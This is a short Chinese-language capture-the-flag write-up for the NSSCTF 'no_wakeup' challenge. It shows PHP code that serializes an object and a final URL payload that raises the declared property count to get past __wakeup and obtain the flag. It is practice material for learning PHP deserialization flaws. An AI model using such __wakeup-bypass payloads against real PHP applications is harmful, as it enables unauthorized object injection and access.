NSSCTF-no_wakeup

 打开网页是一个派萌的表情包（原神玩家手动狗头）

 按照题目的提示点击，出现题目的源码，

观察题目源码，发现就是一个简单的反序列化，这边手打一下php （自己太菜了，枯了）

 

 

<?php
class HaHaHa{
public $admin;
public $passwd;
public function __construct(){
$this->admin ="admin";
$this->passwd ="w11m";
}
}
$b = new HaHaHa();
echo serialize($b);
?>

php运行一下，得到序列化的payload

O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"w11m";}

此时再看一下题目的源码，发现源码中有_wakeup函数，绕过这个函数将变量的数目改的更大一点就好，

O:6:"HaHaHa":4:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"w11m";}

最终payload：url?p=O:6:"HaHaHa":4:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"w11m";}

 执行之后得到flag